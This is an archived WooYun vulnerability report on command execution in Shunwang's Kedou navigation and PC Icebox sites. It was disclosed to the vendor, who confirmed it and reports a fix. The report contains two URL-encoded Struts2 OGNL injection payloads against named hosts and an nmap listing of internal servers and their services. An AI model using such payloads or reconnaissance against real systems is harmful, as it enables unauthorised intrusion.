当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-033230

漏洞标题:杭州顺网某系统命令执行

相关厂商:shunwang.com

漏洞作者: 啦绯哥

提交时间:2013-08-02 10:42

修复时间:2013-09-16 10:43

公开时间:2013-09-16 10:43

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-08-02: 细节已通知厂商并且等待厂商处理中
2013-08-02: 厂商已经确认,细节仅向厂商公开
2013-08-12: 细节向核心白帽子及相关领域专家公开
2013-08-22: 细节向普通白帽子公开
2013-09-01: 细节向实习白帽子公开
2013-09-16: 细节向公众公开

简要描述:

rt

详细说明:

本来想做一次比较深入的渗透测试,由于工作和时间的原因,没办法再进行下去了!
贵公司好像最近在做业务调整,不知道有么有礼物。
现发现重要问题如下:
蝌蚪网址导航命令执行:
http://123.kedou.com/help.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D
PC保鲜盒业务平台命令执行:
该IP好像部署了好几个网站:
http://content.icebox.cn
http://pp.icebox.cn
http://ssoserver.icebox.cn/toLogin.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D

漏洞证明:

123蝌蚪导航.PNG


.PNG


Host: 172.16.15.29 () Ports: 22/open/tcp//ssh/OpenSSH 4.3 (protocol 2.0)/, 80/open/tcp//http/nginx 1.0.15/, 111/open/tcp//rpcbind/2 (RPC #100000)/, 1998/open/tcp//http/BaseHTTPServer 0.3 (Python SimpleXMLRPCServer; Python 2.5.2)/, 3000/open/tcp//http/WEBrick httpd 1.3.1 (Ruby 1.8.7 (2012-06-29))/, 3306/open/tcp//mysql/MySQL (unauthorized)/ Ignored State: closed (994) OS: Linux 2.6.9 - 2.6.30 Seq Index: 208 IP ID Seq: All zeros
Host: 172.16.15.37 () Ports: 21/open/tcp//ftp/vsftpd 2.3.0/, 22/open/tcp//ssh/OpenSSH 5.5p1 Debian 4ubuntu5 (Ubuntu Linux; protocol 2.0)/, 3306/open/tcp//mysql/MySQL 5.1.49-1ubuntu8.1/ Ignored State: closed (997) OS: Linux 2.6.19 - 2.6.35 Seq Index: 203 IP ID Seq: All zeros
Host: 172.16.15.62 () Ports: 22/open/tcp//ssh/OpenSSH 4.3 (protocol 2.0)/, 53/open/tcp//domain/ISC BIND 9.6.1-P1/, 80/open/tcp//http?//, 111/open/tcp//rpcbind/2 (RPC #100000)/, 3306/open/tcp//mysql/MySQL (unauthorized)/, 8080/open/tcp//http-proxy?// Ignored State: closed (994) OS: Linux 2.6.9 - 2.6.30 Seq Index: 177 IP ID Seq: All zeros
Host: 172.16.15.63 () Ports: 22/open/tcp//ssh/OpenSSH 4.3 (protocol 2.0)/, 53/open/tcp//domain/ISC BIND 9.6.1-P1/, 80/open/tcp//http?//, 111/open/tcp//rpcbind/2 (RPC #100000)/, 3306/open/tcp//mysql/MySQL (unauthorized)/, 8080/open/tcp//http-proxy?// Ignored State: closed (994) OS: Linux 2.6.9 - 2.6.30|Linux 2.6.32 Seq Index: 197 IP ID Seq: All zeros
Host: 172.16.15.93 () Ports: 22/open/tcp//ssh/OpenSSH 4.3 (protocol 2.0)/, 80/open/tcp//http/lighttpd 1.4.20/, 111/open/tcp//rpcbind/2 (RPC #100000)/, 2049/open/tcp//nfs/2-4 (RPC #100003)/, 3306/open/tcp//mysql/MySQL (unauthorized)/ Ignored State: closed (995) OS: Linux 2.6.9 - 2.6.30 Seq Index: 204 IP ID Seq: All zeros
Host: 172.16.15.98 () Ports: 22/open/tcp//ssh/OpenSSH 4.3 (protocol 2.0)/, 80/open/tcp//http/nginx 0.8.54/, 111/open/tcp//rpcbind/2 (RPC #100000)/, 3306/open/tcp//mysql/MySQL 5.1.54-log/ Ignored State: closed (996) OS: Linux 2.6.9 - 2.6.30 Seq Index: 206 IP ID Seq: All zeros
Host: 172.16.15.103 () Ports: 23/open/tcp//telnet/Microsoft Windows XP telnetd/, 135/open/tcp//msrpc/Microsoft Windows RPC/, 139/open/tcp//netbios-ssn//, 1025/open/tcp//msrpc/Microsoft Windows RPC/, 3306/open/tcp//mysql/MySQL (unauthorized)/, 3389/open/tcp//ms-wbt-server/Microsoft Terminal Service/, 9900/open/tcp//iua?// Ignored State: closed (993) OS: Microsoft Windows XP SP2 or Windows Server 2003 SP1 or SP2 Seq Index: 261 IP ID Seq: Incremental
Host: 172.16.15.172 () Ports: 25/open/tcp//smtp/Microsoft ESMTP 7.5.7601.17514/, 53/open/tcp//domain/Microsoft DNS 6.1.7601/, 80/open/tcp//http/Microsoft IIS httpd 7.5/, 81/open/tcp//http/Microsoft IIS httpd 7.5/, 88/open/tcp//kerberos-sec/Windows 2003 Kerberos (server time: 2013-05-18 12:57:27Z)/, 135/open/tcp//msrpc/Microsoft Windows RPC/, 139/open/tcp//netbios-ssn//, 389/open/tcp//ldap//, 445/open/tcp//netbios-ssn//, 464/open/tcp//kpasswd5?//, 593/open/tcp//ncacn_http/Microsoft Windows RPC over HTTP 1.0/, 636/open/tcp//tcpwrapped//, 1433/open/tcp//ms-sql-s/Microsoft SQL Server 2008 R2 10.50.1790.00; RTM+/, 1688/open/tcp//msrpc/Microsoft Windows RPC/, 1801/open/tcp//msmq?//, 2103/open/tcp//msrpc/Microsoft Windows RPC/, 2105/open/tcp//msrpc/Microsoft Windows RPC/, 2107/open/tcp//msrpc/Microsoft Windows RPC/, 2382/open/tcp//ms-olap3?//, 2383/open/tcp//ms-olap4?//, 3268/open/tcp//ldap//, 3269/open/tcp//tcpwrapped//, 3300/open/tcp//mysql/MySQL (unauthorized)/, 3306/open/tcp//mysql/MySQL (unauthorized)/, 3389/open/tcp//ms-wbt-server/Microsoft Terminal Service/, 8082/open/tcp//blackice-alerts?//, 8084/open/tcp//http/Apache Tomcat|Coyote JSP engine 1.1/, 8093/open/tcp//unknown//, 9999/open/tcp//http/Microsoft IIS httpd 7.5/, 49152/open/tcp//msrpc/Microsoft Windows RPC/, 49153/open/tcp//msrpc/Microsoft Windows RPC/, 49154/open/tcp//msrpc/Microsoft Windows RPC/, 49155/open/tcp//msrpc/Microsoft Windows RPC/, 49157/open/tcp//ncacn_http/Microsoft Windows RPC over HTTP 1.0/, 49158/open/tcp//msrpc/Microsoft Windows RPC/, 49165/open/tcp//msrpc/Microsoft Windows RPC/ Ignored State: closed (964) OS: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, or Windows 8 Seq Index: 258 IP ID Seq: Incremental
Host: 172.16.16.61 () Ports: 22/open/tcp//ssh/OpenSSH 4.3 (protocol 2.0)/, 111/open/tcp//rpcbind/2 (RPC #100000)/, 873/open/tcp//rsync/(protocol version 30)/, 3306/open/tcp//mysql/MySQL 5.1.57-rel12.8-log/, 5666/open/tcp//tcpwrapped// Ignored State: closed (995) OS: Linux 2.6.9 - 2.6.30 Seq Index: 196 IP ID Seq: All zeros
Host: 172.16.16.84 () Ports: 22/open/tcp//ssh/OpenSSH 4.3 (protocol 2.0)/, 80/open/tcp//http?//, 111/open/tcp//rpcbind/2 (RPC #100000)/, 1999/open/tcp//ssl|tcp-id-port?//, 3306/open/tcp//mysql/MySQL (unauthorized)/, 5666/open/tcp//tcpwrapped// Ignored State: closed (994) OS: Linux 2.6.9 - 2.6.30|Linux 2.6.32 Seq Index: 193 IP ID Seq: All zeros
Host: 172.16.16.93 () Ports: 22/open/tcp//ssh/OpenSSH 4.3 (protocol 2.0)/, 111/open/tcp//rpcbind/2 (RPC #100000)/, 873/open/tcp//rsync/(protocol version 30)/, 3306/open/tcp//mysql/MySQL 5.1.57-rel12.8-log/, 5666/open/tcp//tcpwrapped// Ignored State: closed (995) OS: Linux 2.6.9 - 2.6.30 Seq Index: 201 IP ID Seq: All zeros
Host: 172.16.16.196 () Ports: 22/open/tcp//ssh/OpenSSH 4.3 (protocol 2.0)/, 111/open/tcp//rpcbind/2 (RPC #100000)/, 873/open/tcp//rsync/(protocol version 30)/, 3306/open/tcp//mysql/MySQL 5.1.57-rel12.8-log/, 5666/open/tcp//tcpwrapped// Ignored State: closed (995) OS: Linux 2.6.13 - 2.6.32|Linux 2.6.18 - 2.6.32|Linux 2.6.22 - 2.6.23|Linux 2.6.9|Linux 2.6.9 - 2.6.24|Linux 2.6.9 - 2.6.30|Linux 2.6.9 - 2.6.33|Linux 2.6.32
Host: 172.16.17.51 () Ports: 22/open/tcp//ssh/OpenSSH 4.3 (protocol 2.0)/, 111/open/tcp//rpcbind/2 (RPC #100000)/, 873/open/tcp//rsync/(protocol version 30)/, 3306/open/tcp//mysql/MySQL 5.1.57-rel12.8-log/ Ignored State: closed (996) OS: Linux 2.6.9 - 2.6.30|Linux 2.6.32 Seq Index: 199 IP ID Seq: All zeros
Host: 172.16.17.52 () Status: Up
Host: 172.16.17.52 () Ports: 22/open/tcp//ssh/OpenSSH 4.3 (protocol 2.0)/, 111/open/tcp//rpcbind/2 (RPC #100000)/, 3306/open/tcp//mysql/MySQL (unauthorized)/ Ignored State: closed (997) OS: Linux 2.6.9 - 2.6.30 Seq Index: 204 IP ID Seq: All zeros
Host: 172.16.17.51 () Ports: 22/open/tcp//ssh/OpenSSH 4.3 (protocol 2.0)/, 111/open/tcp//rpcbind/2 (RPC #100000)/, 873/open/tcp//rsync/(protocol version 30)/, 3306/open/tcp//mysql/MySQL 5.1.57-rel12.8-log/ Ignored State: closed (996) OS: Linux 2.6.9 - 2.6.30 Seq Index: 201 IP ID Seq: All zeros
Host: 172.16.17.52 () Ports: 22/open/tcp//ssh/OpenSSH 4.3 (protocol 2.0)/, 111/open/tcp//rpcbind/2 (RPC #100000)/, 3306/open/tcp//mysql/MySQL (unauthorized)/ Ignored State: closed (997) OS: Linux 2.6.9 - 2.6.30 Seq Index: 200 IP ID Seq: All zeros
Host: 172.16.17.85 () Ports: 22/open/tcp//ssh/OpenSSH 4.3 (protocol 2.0)/, 111/open/tcp//rpcbind/2 (RPC #100000)/, 873/open/tcp//rsync/(protocol version 30)/, 3306/open/tcp//mysql/MySQL 5.1.57-rel12.8-log/, 5666/open/tcp//tcpwrapped// Ignored State: closed (995) OS: Linux 2.6.18 - 2.6.32 Seq Index: 249 IP ID Seq: All zeros
Host: 172.16.17.161 () Ports: 22/open/tcp//ssh/OpenSSH 4.3 (protocol 2.0)/, 111/open/tcp//rpcbind/2 (RPC #100000)/, 873/open/tcp//rsync/(protocol version 30)/, 3306/open/tcp//mysql/MySQL 5.1.57-rel12.8-log/ Ignored State: closed (996) OS: Linux 2.6.18 - 2.6.32 Seq Index: 261 IP ID Seq: All zeros
Host: 172.16.17.169 () Ports: 22/open/tcp//ssh/OpenSSH 4.3 (protocol 2.0)/, 111/open/tcp//rpcbind/2 (RPC #100000)/, 873/open/tcp//rsync/(protocol version 30)/, 3306/open/tcp//mysql/MySQL 5.1.57-rel12.8-log/ Ignored State: closed (996) OS: Linux 2.6.18 - 2.6.32 Seq Index: 258 IP ID Seq: All zeros
Host: 172.16.21.16 () Ports: 22/open/tcp//ssh/OpenSSH 4.3 (protocol 2.0)/, 111/open/tcp//rpcbind/2 (RPC #100000)/, 3306/open/tcp//mysql/MySQL 5.1.57-rel12.8-log/, 5666/open/tcp//tcpwrapped// Ignored State: closed (996) OS: Linux 2.6.18 - 2.6.32 Seq Index: 260 IP ID Seq: All zeros
Host: 172.16.22.11 () Ports: 22/open/tcp//ssh/OpenSSH 5.3 (protocol 2.0)/, 80/open/tcp//http/Apache httpd 2.2.15 ((CentOS))/, 111/open/tcp//rpcbind/2-4 (RPC #100000)/, 3306/open/tcp//mysql/MySQL (unauthorized)/ Ignored State: closed (996) OS: Linux 2.6.32 - 3.6 Seq Index: 255 IP ID Seq: All zeros

修复方案:

补丁

版权声明:转载请注明来源 啦绯哥@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2013-08-02 15:06

厂商回复:

感谢关注顺网安全,已经安排人员进行修复。

最新状态:

2013-10-29:已经修复完成,感谢关注顺网安全